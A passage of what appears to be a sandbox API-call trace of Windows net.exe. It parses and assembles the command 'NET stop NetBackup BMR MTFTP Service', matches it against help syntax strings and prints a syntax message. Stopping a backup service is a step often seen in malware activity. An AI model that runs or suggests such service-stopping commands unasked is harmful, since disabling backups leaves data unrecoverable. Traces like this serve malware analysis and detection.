_String="CONTINUE", _Context=0x1eb) returned="CONTINUE" [0056.108] wcsspn (_String="CONTINUE", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0056.108] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0xc60170 | out: _String=0x0, _Context=0xc60170) returned=" CONT" [0056.108] wcsspn (_String=" CONT", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0056.108] _wcsicmp (_String1="CONT", _String2="stop") returned -16 [0056.108] _wcsicmp (_String1="CONT", _String2="NetBackup") returned -11 [0056.108] _wcsicmp (_String1="CONT", _String2="BMR") returned 1 [0056.108] _wcsicmp (_String1="CONT", _String2="MTFTP") returned -10 [0056.108] _wcsicmp (_String1="CONT", _String2="Service") returned -16 [0056.108] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0056.108] wcstok (in: _String="\r\nFILE: FILES", _Delimiter=":,$", _Context=0x1eb | out: _String="\r\nFILE", _Context=0x1eb) returned="\r\nFILE" [0056.109] wcsspn (_String="\r\nFILE", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0056.109] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0xc60196 | out: _String=0x0, _Context=0xc60196) returned=" FILES" [0056.109] wcsspn (_String=" FILES", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0056.109] _wcsicmp (_String1="FILES", _String2="stop") returned -13 [0056.109] _wcsicmp (_String1="FILES", _String2="NetBackup") returned -8 [0056.109] _wcsicmp (_String1="FILES", _String2="BMR") returned 4 [0056.109] _wcsicmp (_String1="FILES", _String2="MTFTP") returned -7 [0056.109] _wcsicmp (_String1="FILES", _String2="Service") returned -13 [0056.109] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0056.109] wcstok (in: _String="\r\nGROUP: GROUPS", _Delimiter=":,$", _Context=0x1eb | out: _String="\r\nGROUP", _Context=0x1eb) returned="\r\nGROUP" [0056.109] wcsspn (_String="\r\nGROUP", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0056.109] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0xc601ba | out: _String=0x0, _Context=0xc601ba) returned=" GROUPS" [0056.109] wcsspn (_String=" GROUPS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0056.109] _wcsicmp (_String1="GROUPS", _String2="stop") returned -12 [0056.109] _wcsicmp (_String1="GROUPS", _String2="NetBackup") returned -7 [0056.109] _wcsicmp (_String1="GROUPS", _String2="BMR") returned 5 [0056.109] _wcsicmp (_String1="GROUPS", _String2="MTFTP") returned -6 [0056.109] _wcsicmp (_String1="GROUPS", _String2="Service") returned -12 [0056.109] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0056.109] wcstok (in: _String="\r\nREPLICATOR: REPL, REPLICATOR", _Delimiter=":,$", _Context=0x1eb | out: _String="\r\nREPLICATOR", _Context=0x1eb) returned="\r\nREPLICATOR" [0056.109] wcsspn (_String="\r\nREPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0056.109] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0xc601e2 | out: _String=0x0, _Context=0xc601e2) returned=" REPL" [0056.109] wcsspn (_String=" REPL", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0056.109] _wcsicmp (_String1="REPL", _String2="stop") returned -1 [0056.109] _wcsicmp (_String1="REPL", _String2="NetBackup") returned 4 [0056.109] _wcsicmp (_String1="REPL", _String2="BMR") returned 16 [0056.109] _wcsicmp (_String1="REPL", _String2="MTFTP") returned 5 [0056.109] _wcsicmp (_String1="REPL", _String2="Service") returned -1 [0056.109] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" REPLICATOR" [0056.109] wcsspn (_String=" REPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0056.109] _wcsicmp (_String1="REPLICATOR", _String2="stop") returned -1 [0056.109] _wcsicmp (_String1="REPLICATOR", _String2="NetBackup") returned 4 [0056.109] _wcsicmp (_String1="REPLICATOR", _String2="BMR") returned 16 [0056.109] _wcsicmp (_String1="REPLICATOR", _String2="MTFTP") returned 5 [0056.109] _wcsicmp (_String1="REPLICATOR", _String2="Service") returned -1 [0056.109] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0056.110] wcstok (in: _String="\r\nSESSION: SESSIONS, SESS", _Delimiter=":,$", _Context=0x1eb | out: _String="\r\nSESSION", _Context=0x1eb) returned="\r\nSESSION" [0056.110] wcsspn (_String="\r\nSESSION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0056.110] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0xc60220 | out: _String=0x0, _Context=0xc60220) returned=" SESSIONS" [0056.110] wcsspn (_String=" SESSIONS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0056.110] _wcsicmp (_String1="SESSIONS", _String2="stop") returned -15 [0056.110] _wcsicmp (_String1="SESSIONS", _String2="NetBackup") returned 5 [0056.110] _wcsicmp (_String1="SESSIONS", _String2="BMR") returned 17 [0056.110] _wcsicmp (_String1="SESSIONS", _String2="MTFTP") returned 6 [0056.110] _wcsicmp (_String1="SESSIONS", _String2="Service") returned 1 [0056.110] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" SESS" [0056.110] wcsspn (_String=" SESS", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0056.110] _wcsicmp (_String1="SESS", _String2="stop") returned -15 [0056.110] _wcsicmp (_String1="SESS", _String2="NetBackup") returned 5 [0056.110] _wcsicmp (_String1="SESS", _String2="BMR") returned 17 [0056.110] _wcsicmp (_String1="SESS", _String2="MTFTP") returned 6 [0056.110] _wcsicmp (_String1="SESS", _String2="Service") returned 1 [0056.110] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0056.110] wcstok (in: _String="\r\nSTATISTICS: STATS", _Delimiter=":,$", _Context=0x1eb | out: _String="\r\nSTATISTICS", _Context=0x1eb) returned="\r\nSTATISTICS" [0056.110] wcsspn (_String="\r\nSTATISTICS", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0056.110] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0xc6025c | out: _String=0x0, _Context=0xc6025c) returned=" STATS" [0056.110] wcsspn (_String=" STATS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0056.110] _wcsicmp (_String1="STATS", _String2="stop") returned -14 [0056.110] _wcsicmp (_String1="STATS", _String2="NetBackup") returned 5 [0056.110] _wcsicmp (_String1="STATS", _String2="BMR") returned 17 [0056.110] _wcsicmp (_String1="STATS", _String2="MTFTP") returned 6 [0056.110] _wcsicmp (_String1="STATS", _String2="Service") returned 15 [0056.110] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0056.110] wcstok (in: _String="\r\nUSER: USERS", _Delimiter=":,$", _Context=0x1eb | out: _String="\r\nUSER", _Context=0x1eb) returned="\r\nUSER" [0056.110] wcsspn (_String="\r\nUSER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0056.110] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0xc6028c | out: _String=0x0, _Context=0xc6028c) returned=" USERS" [0056.110] wcsspn (_String=" USERS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0056.110] _wcsicmp (_String1="USERS", _String2="stop") returned 2 [0056.110] _wcsicmp (_String1="USERS", _String2="NetBackup") returned 7 [0056.110] _wcsicmp (_String1="USERS", _String2="BMR") returned 19 [0056.110] _wcsicmp (_String1="USERS", _String2="MTFTP") returned 8 [0056.110] _wcsicmp (_String1="USERS", _String2="Service") returned 2 [0056.110] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0056.111] wcstok (in: _String="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR", _Delimiter=":,$", _Context=0x1eb | out: _String="\r\nWORKSTATION", _Context=0x1eb) returned="\r\nWORKSTATION" [0056.111] wcsspn (_String="\r\nWORKSTATION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0056.111] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0xc602b0 | out: _String=0x0, _Context=0xc602b0) returned=" REDIRECTOR" [0056.111] wcsspn (_String=" REDIRECTOR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0056.111] _wcsicmp (_String1="REDIRECTOR", _String2="stop") returned -1 [0056.111] _wcsicmp (_String1="REDIRECTOR", _String2="NetBackup") returned 4 [0056.111] _wcsicmp (_String1="REDIRECTOR", _String2="BMR") returned 16 [0056.111] _wcsicmp (_String1="REDIRECTOR", _String2="MTFTP") returned 5 [0056.111] _wcsicmp (_String1="REDIRECTOR", _String2="Service") returned -1 [0056.111] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" REDIR" [0056.111] wcsspn (_String=" REDIR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0056.111] _wcsicmp (_String1="REDIR", _String2="stop") returned -1 [0056.111] _wcsicmp (_String1="REDIR", _String2="NetBackup") returned 4 [0056.111] _wcsicmp (_String1="REDIR", _String2="BMR") returned 16 [0056.111] _wcsicmp (_String1="REDIR", _String2="MTFTP") returned 5 [0056.111] _wcsicmp (_String1="REDIR", _String2="Service") returned -1 [0056.111] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" RDR" [0056.111] wcsspn (_String=" RDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0056.111] _wcsicmp (_String1="RDR", _String2="stop") returned -1 [0056.111] _wcsicmp (_String1="RDR", _String2="NetBackup") returned 4 [0056.111] _wcsicmp (_String1="RDR", _String2="BMR") returned 16 [0056.111] _wcsicmp (_String1="RDR", _String2="MTFTP") returned 5 [0056.111] _wcsicmp (_String1="RDR", _String2="Service") returned -1 [0056.111] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" WORK" [0056.111] wcsspn (_String=" WORK", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0056.111] _wcsicmp (_String1="WORK", _String2="stop") returned 4 [0056.111] _wcsicmp (_String1="WORK", _String2="NetBackup") returned 9 [0056.111] _wcsicmp (_String1="WORK", _String2="BMR") returned 21 [0056.111] _wcsicmp (_String1="WORK", _String2="MTFTP") returned 10 [0056.111] _wcsicmp (_String1="WORK", _String2="Service") returned 4 [0056.111] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" WKSTA" [0056.111] wcsspn (_String=" WKSTA", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0056.111] _wcsicmp (_String1="WKSTA", _String2="stop") returned 4 [0056.111] _wcsicmp (_String1="WKSTA", _String2="NetBackup") returned 9 [0056.111] _wcsicmp (_String1="WKSTA", _String2="BMR") returned 21 [0056.111] _wcsicmp (_String1="WKSTA", _String2="MTFTP") returned 10 [0056.111] _wcsicmp (_String1="WKSTA", _String2="Service") returned 4 [0056.111] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" PRDR" [0056.112] wcsspn (_String=" PRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0056.112] _wcsicmp (_String1="PRDR", _String2="stop") returned -3 [0056.112] _wcsicmp (_String1="PRDR", _String2="NetBackup") returned 2 [0056.112] _wcsicmp (_String1="PRDR", _String2="BMR") returned 14 [0056.112] _wcsicmp (_String1="PRDR", _String2="MTFTP") returned 3 [0056.112] _wcsicmp (_String1="PRDR", _String2="Service") returned -3 [0056.112] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" DEVRDR" [0056.112] wcsspn (_String=" DEVRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0056.112] _wcsicmp (_String1="DEVRDR", _String2="stop") returned -15 [0056.112] _wcsicmp (_String1="DEVRDR", _String2="NetBackup") returned -10 [0056.112] _wcsicmp (_String1="DEVRDR", _String2="BMR") returned 2 [0056.112] _wcsicmp (_String1="DEVRDR", _String2="MTFTP") returned -9 [0056.112] _wcsicmp (_String1="DEVRDR", _String2="Service") returned -15 [0056.112] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0056.112] wcstok (in: _String="\r\nSERVER: SVR, SRV", _Delimiter=":,$", _Context=0x1eb | out: _String="\r\nSERVER", _Context=0x1eb) returned="\r\nSERVER" [0056.112] wcsspn (_String="\r\nSERVER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0056.112] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0xc6033a | out: _String=0x0, _Context=0xc6033a) returned=" SVR" [0056.112] wcsspn (_String=" SVR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0056.112] _wcsicmp (_String1="SVR", _String2="stop") returned 2 [0056.112] _wcsicmp (_String1="SVR", _String2="NetBackup") returned 5 [0056.112] _wcsicmp (_String1="SVR", _String2="BMR") returned 17 [0056.112] _wcsicmp (_String1="SVR", _String2="MTFTP") returned 6 [0056.112] _wcsicmp (_String1="SVR", _String2="Service") returned 17 [0056.112] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" SRV" [0056.112] wcsspn (_String=" SRV", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0056.112] _wcsicmp (_String1="SRV", _String2="stop") returned -2 [0056.112] _wcsicmp (_String1="SRV", _String2="NetBackup") returned 5 [0056.112] _wcsicmp (_String1="SRV", _String2="BMR") returned 17 [0056.112] _wcsicmp (_String1="SRV", _String2="MTFTP") returned 6 [0056.112] _wcsicmp (_String1="SRV", _String2="Service") returned 13 [0056.112] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0056.112] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc5e, dwLanguageId=0x0, lpBuffer=0x9ef218, nSize=0x0, Arguments=0x9ef214 | out: lpBuffer="䡠Å\x9e警ģ౞") returned 0x1c [0056.112] wcstok (in: _String="NAMES$\r\nSYNTAX$\r\nSERVICES$\r\n", _Delimiter="$", _Context=0x1eb | out: _String="NAMES", _Context=0x1eb) returned="NAMES" [0056.112] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nSYNTAX" [0056.112] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nSERVICES" [0056.112] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\n" [0056.112] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0056.113] wcsspn (_String="NAMES", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0056.113] _wcsicmp (_String1="stop", _String2="NAMES") returned 5 [0056.113] wcsspn (_String="\r\nSYNTAX", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0056.113] _wcsicmp (_String1="stop", _String2="SYNTAX") returned -5 [0056.113] wcsspn (_String="\r\nSERVICES", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0056.113] _wcsicmp (_String1="stop", _String2="SERVICES") returned 15 [0056.113] wcscpy_s (in: _Destination=0x1247610, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0056.113] LoadLibraryExW (lpLibFileName="NETMSG", hFile=0x0, dwFlags=0x20) returned 0xdc0002 [0056.113] FormatMessageW (in: dwFlags=0x2a00, lpSource=0xdc0002, dwMessageId=0x111d, dwLanguageId=0x0, lpBuffer=0x1247c20, nSize=0x800, Arguments=0x12473d0 | out: lpBuffer="The syntax of this command is:\r\n") returned 0x20 [0056.114] GetFileType (hFile=0x90) returned 0x2 [0056.114] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x9ef1e0 | out: lpMode=0x9ef1e0) returned 1 [0056.114] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x1247c20*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0x9ef1ec, lpReserved=0x0 | out: lpBuffer=0x1247c20*, lpNumberOfCharsWritten=0x9ef1ec*=0x20) returned 1 [0056.115] GetFileType (hFile=0x90) returned 0x2 [0056.115] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x9ef1e0 | out: lpMode=0x9ef1e0) returned 1 [0056.115] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x12212e4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x9ef1ec, lpReserved=0x0 | out: lpBuffer=0x12212e4*, lpNumberOfCharsWritten=0x9ef1ec*=0x2) returned 1 [0056.115] wcscpy_s (in: _Destination=0x9ef288, _SizeInWords=0x200, _Source="NET" | out: _Destination="NET") returned 0x0 [0056.115] wcsncat_s (in: _Destination="NET", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET ") returned 0x0 [0056.115] wcsncat_s (in: _Destination="NET ", _SizeInWords=0x200, _Source="stop", _MaxCount=0xffffffff | out: _Destination="NET stop") returned 0x0 [0056.115] wcsncat_s (in: _Destination="NET stop", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ") returned 0x0 [0056.115] wcsncat_s (in: _Destination="NET stop ", _SizeInWords=0x200, _Source="NetBackup", _MaxCount=0xffffffff | out: _Destination="NET stop NetBackup") returned 0x0 [0056.115] wcsncat_s (in: _Destination="NET stop NetBackup", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop NetBackup ") returned 0x0 [0056.115] wcsncat_s (in: _Destination="NET stop NetBackup ", _SizeInWords=0x200, _Source="BMR", _MaxCount=0xffffffff | out: _Destination="NET stop NetBackup BMR") returned 0x0 [0056.115] wcsncat_s (in: _Destination="NET stop NetBackup BMR", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop NetBackup BMR ") returned 0x0 [0056.116] wcsncat_s (in: _Destination="NET stop NetBackup BMR ", _SizeInWords=0x200, _Source="MTFTP", _MaxCount=0xffffffff | out: _Destination="NET stop NetBackup BMR MTFTP") returned 0x0 [0056.116] wcsncat_s (in: _Destination="NET stop NetBackup BMR MTFTP", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop NetBackup BMR MTFTP ") returned 0x0 [0056.116] wcsncat_s (in: _Destination="NET stop NetBackup BMR MTFTP ", _SizeInWords=0x200, _Source="Service", _MaxCount=0xffffffff | out: _Destination="NET stop NetBackup BMR MTFTP Service") returned 0x0 [0056.116] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģ௼") returned 0xad [0056.116] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{minutes", _MaxCount=0x24) returned 18 [0056.116] LocalFree (hMem=0xc60378) returned 0x0 [0056.116] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģ௿") returned 0x2e [0056.116] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET COMPUTER\r\n\\\\computername {/ADD |", _MaxCount=0x24) returned 16 [0056.116] LocalFree (hMem=0xc60378) returned 0x0 [0056.116] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģం") returned 0x7d [0056.116] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET CONFIG SERVER\r\n[/AUTODISCONNECT:", _MaxCount=0x24) returned 16 [0056.116] LocalFree (hMem=0xc60378) returned 0x0 [0056.116] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģఅ") returned 0x26 [0056.116] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET CONFIG\r\n[SERVER | WORKSTATION]\r\n", _MaxCount=0x24) returned 16 [0056.116] LocalFree (hMem=0xc60378) returned 0x0 [0056.116] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䉨Å\x9e蛬ģఈ") returned 0x19 [0056.116] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x24) returned 16 [0056.116] LocalFree (hMem=0xc54268) returned 0x0 [0056.116] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģఋ") returned 0x1b [0056.116] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x24) returned 13 [0056.116] LocalFree (hMem=0xc60378) returned 0x0 [0056.116] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģఎ") returned 0xbe [0056.116] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET GROUP\r\n[groupname [/COMMENT:\"tex", _MaxCount=0x24) returned 12 [0056.116] LocalFree (hMem=0xc60378) returned 0x0 [0056.116] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģ఑") returned 0x33 [0056.116] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET HELP\r\ncommand\r\n -or-\r\nNET co", _MaxCount=0x24) returned 11 [0056.116] LocalFree (hMem=0xc60378) returned 0x0 [0056.116] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䉨Å\x9e蛬ģఔ") returned 0x19 [0056.116] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x24) returned 11 [0056.116] LocalFree (hMem=0xc54268) returned 0x0 [0056.116] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģగ") returned 0xc1 [0056.116] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET LOCALGROUP\r\n[groupname [/COMMENT", _MaxCount=0x24) returned 7 [0056.117] LocalFree (hMem=0xc60378) returned 0x0 [0056.117] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="谀Å\x9e蛬ģచ") returned 0x16 [0056.117] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x24) returned 3 [0056.117] LocalFree (hMem=0xc58c00) returned 0x0 [0056.117] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģఝ") returned 0x33 [0056.117] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET SESSION\r\n[\\\\computername] [/DELE", _MaxCount=0x24) returned 15 [0056.117] LocalFree (hMem=0xc60378) returned 0x0 [0056.117] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="͸Æ\x9e蛬ģఠ") returned 0x234 [0056.117] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET SHARE\r\nsharename\r\n shar", _MaxCount=0x24) returned 12 [0056.117] LocalFree (hMem=0xc60378) returned 0x0 [0056.117] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䢨Å\x9e蛬ģణ") returned 0x13 [0056.117] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET START BROWSER\r\n", _MaxCount=0x24) returned 14 [0056.117] LocalFree (hMem=0xc548a8) returned 0x0 [0056.117] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䉨Å\x9e蛬ģద") returned 0x14 [0056.117] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET START EVENTLOG\r\n", _MaxCount=0x24) returned 14 [0056.117] LocalFree (hMem=0xc54268) returned 0x0 [0056.117] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䉨Å\x9e蛬ģ఩") returned 0x14 [0056.118] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET START NETLOGON\r\n", _MaxCount=0x24) returned 14 [0056.118] LocalFree (hMem=0xc54268) returned 0x0 [0056.118] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="㟀Å\x9e蛬ģబ") returned 0x11 [0056.118] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET START RPCSS\r\n", _MaxCount=0x24) returned 14 [0056.118] LocalFree (hMem=0xc537c0) returned 0x0 [0056.118] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䉨Å\x9e蛬ģయ") returned 0x14 [0056.118] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET START SCHEDULE\r\n", _MaxCount=0x24) returned 14 [0056.118] LocalFree (hMem=0xc54268) returned 0x0 [0056.118] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䢨Å\x9e蛬ģల") returned 0x12 [0056.118] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET START SERVER\r\n", _MaxCount=0x24) returned 14 [0056.118] LocalFree (hMem=0xc548a8) returned 0x0 [0056.118] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="䑠Å\x9e蛬ģవ") returned 0xf [0056.118] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET START UPS\r\n", _MaxCount=0x24) returned 14 [0056.118] LocalFree (hMem=0xc54460) returned 0x0 [0056.118] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, Arguments=0x9ef1f8 | out: lpBuffer="谀Å\x9e蛬ģస") returned 0x17 [0056.118] _wcsnicmp (_String1="NET stop NetBackup BMR MTFTP Service", _String2="NET START WORKSTATION\r\n", _MaxCount=0x24) returned 14 [0056.118] LocalFree (hMem=0xc58c00) returned 0x0 [0056.118] FormatMessageW (in: dwFlags=0x1900, lpSource=0xc30002, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x9ef1fc, nSize=0x0, 